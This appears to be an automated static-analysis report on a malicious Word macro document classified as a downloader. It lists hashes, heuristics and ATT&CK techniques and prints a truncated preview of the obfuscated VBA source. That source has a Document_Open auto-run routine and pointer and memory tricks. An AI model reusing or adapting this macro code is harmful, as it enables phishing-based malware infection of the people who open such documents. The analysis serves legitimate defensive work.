Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60149abf042392e3…

MALICIOUS

Office (OLE)

253.0 KB Created: 2018-03-06 15:09:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: f53e5b89deb58b2b6a9543ba8aaa4f69 SHA-1: fad2a9210764a89f9524a2d62de8f76b64d012b3 SHA-256: 60149abf042392e352795c4bb2d731a75332e4bceb0daf83164baa0dcfa0dcd3
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV heuristic and the presence of VBA macros, specifically a Document_Open macro, indicate malicious intent. The VBA macro code appears to be obfuscated but is designed to download and execute a second-stage payload, as suggested by the 'Doc.Downloader' classification. The benign URLs extracted are not indicative of malicious activity.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13645 bytes
SHA-256: c2e228e51e65b4d5ba4450fcb8c3e921dfb6e30bda4723f75bff9b8d2519807b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function miscreance(losing)
Dim trainbearer As Long
Dim beamish As Byte
Dim decadent As Long
Dim compiler As String
#If (57 - 111 + 454 + 46 - 62 + 316) > ((4 - 125 + 441) - (90 - 126 + 576) * 1) And ((51 - 106 + 83) - (72 - 111 + 67)) * 2 < (Win64) Then
Dim centuplicate As String
Dim shingling As LongPtr
paillasse = 109 - 125 + 24
Dim caique As LongPtr
Dim nonrestrictive As String
Dim istic As Variant
Dim birdseye As LongPtr
Dim window As String
advertising = VarPtr(shingling)
Commit = evagation(advertising, VarPtr(losing) + (114 - 58 - 48), paillasse)
#ElseIf (48 - 87 + 439 + 71 - 29 + 258) > ((99 - 102 + 323) - (78 - 75 + 537) * 1) And Not ((40 - 80 + 68) - (70 - 45 + 3)) * 2 < (Win64) Then
Dim shingling As Long
paillasse = 104 - 127 + 27
Dim caique As Long
Dim birdseye As Long
#End If
advertising = VarPtr(shingling)
Commit = genre(advertising, VarPtr(losing) + (24 - 125 + 109), paillasse)
maidenly = 5 - 121 + 115
caique = 100 - 113 + 13
offuscate = 16 - 67 + 51
birdseye = 114 - 128 + 9932
arrack = 14 - 98 + 4180
quadfiform = 1 - 108 + 171
transitorily = abutting(ByVal maidenly, _
caique, ByVal offuscate, birdseye, ByVal arrack, _
ByVal quadfiform)
bathe = "tripalmitin"

prosalprosy = dirtily And 423

exchanger = genre(caique, shingling, 82 - 78 + 5879)
gath = 17 + 52
 Pmt 0, gath, 3616, 33767, 4

miscreance = caique
End Function
Private Sub Document_Open()
Dim doublebogey As Byte
Dim discretional As String
recordbreaking = crucifer
bedeck = tavern
reservedly
mellifluous = 11 + 34
 Pmt 0, mellifluous, 16970, 47194, 2
End Sub
Sub reservedly()
Dim miscegenate As String
Dim guiltridden As Variant
activeness.unscoured.Value = Day(#12/5/2013#)
varday = morocco = "ho"
binge = "moniliales"
deconstructionist = "egurgitate"
su = "cacodemon"
dewey = "harping"

bushranger = symbolize
alpestrine = cocozelle
aphorism = "blebby"
Set drunk = activeness.unscoured.SelectedItem
dartre = 36 + 42
 Pmt 0, dartre, 4082, 44229, 2

militat = drunk.Name
precipitously = 113 - 23 + 7754
ambassadorial = Right(militat, precipitously)
down = shrilly(ambassadorial)
stillroom = 6 + 29
 Pmt 0, stillroom, 26422, 14419, 7

marathon = "containerized"
#If (12 - 37 + 425 + 109 - 27 + 218) > ((17 - 46 + 349) - (120 - 42 + 462) * 1) And ((95 - 70 + 3) - (8 - 13 + 33)) * 2 < (Win64) Then
Dim celllike As Long
Dim delire As LongPtr
Dim homobasidiomycetes As LongPtr
Dim lifeless As Variant
#ElseIf (100 - 115 + 415 + 124 - 104 + 280) > ((29 - 33 + 324) - (75 - 92 + 557) * 1) And Not ((114 - 112 + 26) - (58 - 28 - 2)) * 2 < (Win64) Then
Dim godmother As Variant
Dim homobasidiomycetes As Long
Dim dimsightedness As Variant
Dim delire As Long
#End If
ceratozamia = 46 - 45 - 1
dispense = misbelieve
foundering = 3 - 31 + 4124
praises = 27 + 19
 Pmt 0, praises, 2397, 20766, 5

battledore = "cafeteria"
tulu = "sociolinguistics"
passive = 34 + 41
 Pmt 0, passive, 33175, 52385, 3

joyless = down
benzoin = strix
delire = miscreance(joyless)
matross = scherzo
#If (102 - 42 + 340 + 40 - 1 + 261) > ((122 - 23 + 221) - (116 - 14 + 438) * 1) And ((49 - 8 - 13) - (29 - 94 + 93)) * 2 < (Win64) Then
Dim anaphor As String
Dim grounded As LongPtr
Dim worrying As LongPtr
Dim gracious As LongPtr
ameer = 51 - 112 + 2125
#ElseIf (126 - 31 + 305 + 46 - 20 + 274) > ((59 - 62 + 323) - (72 - 32 + 500) * 1) And Not ((33 - 19 + 14) - (117 - 11 - 78)) * 2 < (Win64) Then
Dim grounded As Long
omophagia = 111 - 75 + 745
Dim worrying As Long
Dim gracious As Long
ameer = omophagia + 3459

#End If
Dim medieval As Byte
Dim opinon As Integer
grounded = 112 - 101 - 11
homobasidiomycetes = delire + ameer
worrying = 45 - 47 + 201529
gracious = 39 - 89 + 3550
squirming = baptize(worrying, grounded, homoba
... (truncated)